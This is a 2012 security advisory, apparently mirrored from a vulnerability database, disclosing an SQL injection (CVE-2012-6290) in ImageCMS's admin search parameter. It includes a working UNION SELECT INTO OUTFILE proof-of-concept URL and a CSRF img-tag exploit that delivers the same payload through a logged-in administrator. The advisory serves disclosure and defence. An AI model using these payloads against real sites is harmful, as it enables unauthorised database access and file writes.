Lucene search

K

High-Tech BridgeHTB23132

HistoryDec 05, 2012 - 12:00 a.m.

SQL Injection Vulnerability in ImageCMS

2012-12-0500:00:00

High-Tech Bridge

www.htbridge.com

32

0.001 Low

EPSS

Percentile

50.5%

High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.

SQL injection vulnerability in ImageCMS: CVE-2012-6290
The vulnerability exists due to insufficient filtration of the “q” HTTP GET parameter passed to “/admin/admin_search/”. A remote authenticated administrator can execute arbitrary SQL commands in the application’s database.
Depending on the database and system configuration PoC (Proof-of-Concept) code below will create “/tmp/file.txt” file with MySQL server version inside:
http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28% 29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20–%202
This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit.
Basic CSRF exploit example:
<img src=“http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,versio n%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20–%202”>

CPENameOperatorVersion
imagecmsle4.0.0b

0.001 Low

EPSS

Percentile

50.5%

Related for HTB23132

packetstorm1 seebug2 cvelist2 cve2 exploitpack1 nvd2 securityvulns2 prion2 exploitdb1